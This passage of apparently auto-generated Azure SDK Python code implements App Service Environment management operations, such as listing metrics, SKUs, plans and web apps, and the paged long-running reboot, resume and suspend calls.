401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_multi_role_pool_instance_metric_definitions_request(
resource_group_name=resource_group_name,
name=name,
instance=instance,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_multi_role_pool_instance_metric_definitions.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_multi_role_pool_instance_metric_definitions_request(
resource_group_name=resource_group_name,
name=name,
instance=instance,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("ResourceMetricDefinitionCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_multi_role_pool_instance_metric_definitions.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/instances/{instance}/metricdefinitions"} # type: ignore
@distributed_trace
def list_multi_role_metric_definitions(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> Iterable[_models.ResourceMetricDefinitionCollection]:
"""Get metric definitions for a multi-role pool of an App Service Environment.
Get metric definitions for a multi-role pool of an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ResourceMetricDefinitionCollection or the result
of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.ResourceMetricDefinitionCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.ResourceMetricDefinitionCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_multi_role_metric_definitions_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_multi_role_metric_definitions.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_multi_role_metric_definitions_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("ResourceMetricDefinitionCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_multi_role_metric_definitions.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/metricdefinitions"} # type: ignore
@distributed_trace
def list_multi_role_pool_skus(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> Iterable[_models.SkuInfoCollection]:
"""Get available SKUs for scaling a multi-role pool.
Get available SKUs for scaling a multi-role pool.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SkuInfoCollection or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.SkuInfoCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.SkuInfoCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_multi_role_pool_skus_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_multi_role_pool_skus.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_multi_role_pool_skus_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("SkuInfoCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_multi_role_pool_skus.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/skus"} # type: ignore
@distributed_trace
def list_multi_role_usages(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> Iterable[_models.UsageCollection]:
"""Get usage metrics for a multi-role pool of an App Service Environment.
Get usage metrics for a multi-role pool of an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either UsageCollection or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.UsageCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.UsageCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_multi_role_usages_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_multi_role_usages.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_multi_role_usages_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("UsageCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_multi_role_usages.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/usages"} # type: ignore
@distributed_trace
def list_operations(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> List[_models.Operation]:
"""List all currently running operations on the App Service Environment.
List all currently running operations on the App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of Operation, or the result of cls(response)
:rtype: list[~azure.mgmt.web.v2019_08_01.models.Operation]
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[List[_models.Operation]]
request = build_list_operations_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_operations.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('[Operation]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_operations.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/operations"} # type: ignore
@distributed_trace
def get_outbound_network_dependencies_endpoints(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> Iterable[_models.OutboundEnvironmentEndpointCollection]:
"""Get the network endpoints of all outbound dependencies of an App Service Environment.
Get the network endpoints of all outbound dependencies of an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either OutboundEnvironmentEndpointCollection or the
result of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.OutboundEnvironmentEndpointCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.OutboundEnvironmentEndpointCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_get_outbound_network_dependencies_endpoints_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_outbound_network_dependencies_endpoints.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_get_outbound_network_dependencies_endpoints_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("OutboundEnvironmentEndpointCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
get_outbound_network_dependencies_endpoints.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/outboundNetworkDependenciesEndpoints"} # type: ignore
@distributed_trace
def reboot( # pylint: disable=inconsistent-return-statements
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> None:
"""Reboot all machines in an App Service Environment.
Reboot all machines in an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[None]
request = build_reboot_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.reboot.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
reboot.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/reboot"} # type: ignore
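    # Note: a successful reboot request is acknowledged with HTTP 202 only;
    # the method returns None (or the result of a caller-supplied `cls`
    # callback) while the reboot itself proceeds asynchronously service-side.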
def _resume_initial(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> _models.WebAppCollection:
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.WebAppCollection]
request = build_resume_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._resume_initial.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('WebAppCollection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_resume_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/resume"} # type: ignore
@distributed_trace
def begin_resume(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> LROPoller[ItemPaged[_models.WebAppCollection]]:
"""Resume an App Service Environment.
Resume an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns an iterator like instance of either
WebAppCollection or the result of cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.WebAppCollection]]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.WebAppCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_resume_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.begin_resume.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_resume_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("WebAppCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._resume_initial( # type: ignore
resource_group_name=resource_group_name,
name=name,
api_version=api_version,
            cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop('error_map', None)
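        # This LRO's final response is itself the first page of a collection,
        # so `get_long_running_output` wraps it in an ItemPaged:
        # `internal_get_next` serves the stored final response when no next
        # link is given and defers to `get_next` for subsequent pages.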
def get_long_running_output(pipeline_response):
def internal_get_next(next_link=None):
if next_link is None:
return pipeline_response
return get_next(next_link)
return ItemPaged(
internal_get_next, extract_data
)
if polling is True:
polling_method = cast(PollingMethod, ARMPolling(
lro_delay,
**kwargs
)) # type: PollingMethod
        elif polling is False:
            polling_method = cast(PollingMethod, NoPolling())
        else:
            polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_resume.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/resume"} # type: ignore
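    # Minimal usage sketch (illustrative only; assumes a configured client):
    #
    #     pager = client.app_service_environments.begin_resume(
    #         resource_group_name="my-rg", name="my-ase").result()
    #     for site in pager:
    #         print(site.name)
    #
    # `begin_suspend` further below follows the same LRO-plus-paging shape.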
@distributed_trace
def list_app_service_plans(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> Iterable[_models.AppServicePlanCollection]:
"""Get all App Service plans in an App Service Environment.
Get all App Service plans in an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AppServicePlanCollection or the result of
cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.AppServicePlanCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.AppServicePlanCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_app_service_plans_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_app_service_plans.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_app_service_plans_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("AppServicePlanCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_app_service_plans.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/serverfarms"} # type: ignore
@distributed_trace
def list_web_apps(
self,
resource_group_name: str,
name: str,
properties_to_include: Optional[str] = None,
**kwargs: Any
) -> Iterable[_models.WebAppCollection]:
"""Get all apps in an App Service Environment.
Get all apps in an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param properties_to_include: Comma separated list of app properties to include. Default value
is None.
:type properties_to_include: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either WebAppCollection or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.WebAppCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.WebAppCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_web_apps_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
properties_to_include=properties_to_include,
template_url=self.list_web_apps.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_web_apps_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
properties_to_include=properties_to_include,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("WebAppCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_web_apps.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/sites"} # type: ignore
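    # Minimal usage sketch (illustrative only; assumes a configured client;
    # the property list is a placeholder). `properties_to_include` is
    # forwarded as a query parameter to enrich each returned app:
    #
    #     for site in client.app_service_environments.list_web_apps(
    #             resource_group_name="my-rg", name="my-ase",
    #             properties_to_include="hostNames"):
    #         print(site.name)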
def _suspend_initial(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> _models.WebAppCollection:
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.WebAppCollection]
request = build_suspend_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._suspend_initial.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('WebAppCollection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_suspend_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/suspend"} # type: ignore
@distributed_trace
def begin_suspend(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> LROPoller[ItemPaged[_models.WebAppCollection]]:
"""Suspend an App Service Environment.
Suspend an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns an iterator like instance of either
WebAppCollection or the result of cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.WebAppCollection]]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.WebAppCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_suspend_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.begin_suspend.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_suspend_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("WebAppCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
